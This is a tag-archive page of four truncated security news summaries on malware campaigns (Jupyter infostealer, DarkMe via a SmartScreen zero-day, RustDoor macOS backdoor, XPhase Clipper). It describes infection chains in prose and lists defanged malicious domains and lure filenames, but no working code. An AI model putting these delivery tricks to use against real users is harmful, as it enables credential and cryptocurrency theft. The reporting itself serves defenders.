Tag Archive for: Targets

Jupyter Malware Variant Targets Browsers, Crypto-Wallets with Sophisticated Evasion Techniques


Security researchers have identified a significant uptick in attacks by a new, more sophisticated variant of the Jupyter malware, targeting popular browsers and crypto-wallets with advanced evasion techniques. This variant, also known as Yellow Cockatoo, Solarmarker, and Polazert, has been active since at least 2020 but has seen a resurgence with enhancements that make it harder to detect.

A Persistent Data-Stealing Cyber Threat

VMware’s Carbon Black team recently observed the malware leveraging PowerShell command modifications and legitimate-looking, digitally signed payloads to infect a growing number of systems. These modifications enhance Jupyter’s evasion capabilities, allowing it to backdoor machines and harvest a variety of credential information without detection. Morphisec and BlackBerry have further detailed its capabilities, including support for command and control communications and the execution of PowerShell scripts and commands, highlighting its function as a full-fledged backdoor.

Jupyter: Getting Around Malware Detection

The recent attacks have seen the Jupyter operator using valid certificates to digitally sign the malware, making it appear legitimate to malware detection tools. VMware researchers noted the malware’s use of SEO poisoning and search engine redirects as part of its attack chain, demonstrating its sophisticated credential harvesting and encrypted communication capabilities. Abe Schneider, threat analyst lead at Carbon Black, highlighted new improvements to the infostealer, including the use of an installer called InnoSetup, which serves as the first payload delivered to victim devices.

A Troubling Increase in Infostealers

Jupyter’s resurgence is part of a broader, concerning trend in the rise of infostealers, exacerbated by the shift to remote work during the COVID-19 pandemic. Organizations like Red Canary and Uptycs have reported sharp increases in infostealer distribution, with attackers leveraging the malware to gain quick, persistent, and privileged access to enterprise networks and systems. The demand for stolen data on criminal forums remains high, underscoring the ongoing threat posed…

Source…

DarkMe Malware Targets Traders Using Microsoft SmartScreen Zero-Day Vulnerability


Feb 14, 2024NewsroomZero-Day / Financial Sector Security

Microsoft SmartScreen Zero-Day Vulnerability

A newly disclosed security flaw in the Microsoft Defender SmartScreen has been exploited as a zero-day by an advanced persistent threat actor called Water Hydra (aka DarkCasino) targeting financial market traders.

Trend Micro, which began tracking the campaign in late December 2023, said it entails the exploitation of CVE-2024-21412, a security bypass vulnerability related to Internet Shortcut Files (.URL).

“In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass Microsoft Defender SmartScreen and infect victims with the DarkMe malware,” the cybersecurity firm said in a Tuesday report.

Microsoft, which addressed the flaw in its February Patch Tuesday update, said an unauthenticated attacker could exploit the flaw by sending the targeted user a specially crafted file in order to bypass displayed security checks.

Cybersecurity

However, successful exploitation banks on the prerequisite that the threat actor convinces the victim to click on the file link to view the attacker-controlled content.

The infection procedure documented by Trend Micro weaponizes CVE-2024-21412 to drop a malicious installer file (“7z.msi”) by clicking on a booby-trapped URL (“fxbulls[.]ru”) distributed via forex trading forums under the pretext of sharing a link to a stock chart image that, in reality, is an internet shortcut file (“photo_2023-12-29.jpg.url”).

“The landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered crafted view,” security researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.

“When users click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security prompt, so the user might not think that this link is malicious.”

The clever trick that makes this possible is the threat actor’s abuse of the search: application protocol, which is used for calling the desktop search application on Windows and has been abused in the past to deliver malware.

The rogue internet shortcut file, for its part, points to another internet shortcut file hosted on a remote server (“2.url”), which, in turn, points to a CMD shell script within a ZIP archive…

Source…

RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers


Feb 16, 2024NewsroomEndpoint Security / Cryptocurrency

Cryptocurrency Firms

Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.

RustDoor was first documented by Bitdefender last week, describing it as a Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It’s distributed by masquerading itself as a Visual Studio update.

While prior evidence uncovered at least three different variants of the backdoor, the exact initial propagation mechanism remained unknown.

That said, the Romanian cybersecurity firm subsequently told The Hacker News that the malware was used as part of a targeted attack rather than a shotgun distribution campaign, noting that it found additional artifacts that are responsible for downloading and executing RustDoor.

Cybersecurity

“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” Bogdan Botezatu, director of threat research and reporting at Bitdefender, said.

Since then, three more malicious samples that act as first-stage payloads have come to light, each of them purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.

The new component of the attack chain – i.e., the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”) – contains a basic shell script that’s responsible for fetching the implant from a website named turkishfurniture[.]blog. It’s also engineered to preview a harmless decoy PDF file (“job.pdf”) hosted on the same site as a distraction.

Fake Job Offers

Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain (“sarkerrentacars[.]com”), whose purpose is to “collect information about the victim’s machine and its network connections using the system_profiler and networksetup utilities, which are part of the macOS operating system.

In addition, the binaries are capable of extracting details about the disk via “diskutil list” as well…

Source…

XPhase Clipper Malware Campaign Targets Crypto Users


A new strain of malware dubbed XPhase Clipper has been stealthily targeting cryptocurrency users. This Clipper malware infiltrates unsuspecting victims’ systems through deceptive websites masquerading as authentic cryptocurrency platforms. 

XPhase Clipper Malware
Source: Cyble

Cybersecurity experts at Cyble Research and Intelligence Labs (CRIL) have found this concerning trend where a large-scale operation is using cloned YouTube videos to target unsuspecting victims on the internet.

This is a churned-down version of the report, shedding light on its modus operandi and the infection chain of XPhase Clipper malware. 

Understanding the XPhase Clipper Malware Campaign

XPhase Clipper Malware Campaign
Source: Cyble

Clipper malware poses a serious threat to cryptocurrency users by pilfering sensitive information, particularly cryptocurrency wallet addresses, from the clipboard. 

With the increasing popularity of cryptocurrencies like Bitcoin and Ethereum, cybercriminals are increasingly exploiting users to abscond with their funds.

XPhase Clipper represents a sophisticated iteration of this malware strain, designed to intercept and manipulate copied cryptocurrency wallet addresses, rerouting funds to the attackers’ accounts. 

The threat actors behind the XPhase Clipper malware campaign are exclusively targeting cryptocurrency users worldwide, deploying a series of deceptive tactics to ensnare victims. 

XPhase Clipper Malware Campaign
Source: Cyble

Notably, phishing sites impersonating reputable platforms such as Metamask and Wazirx have emerged as conduits for spreading the XPhase Clipper payload.

XPhase Clipper
Source: Cyble

These malicious sites lure users into downloading a zip file housing an array of malicious components, including a dropper executable, VB Script, and Batch script files, culminating in the execution of the clipper payload in the form of a DLL file.

Clipper Malware
Source: Cyble

XPhase Clipper Malware Targets Indian Crypto Users 

Upon closer examination, CRIL found that the infection chain is meticulously orchestrated, with each stage serving to conceal the malicious activities of the XPhase Clipper. 

The VB Script plays an important role in facilitating the download and execution of the clipper payload, while the Batch script ensures persistence by adding a registry…

Source…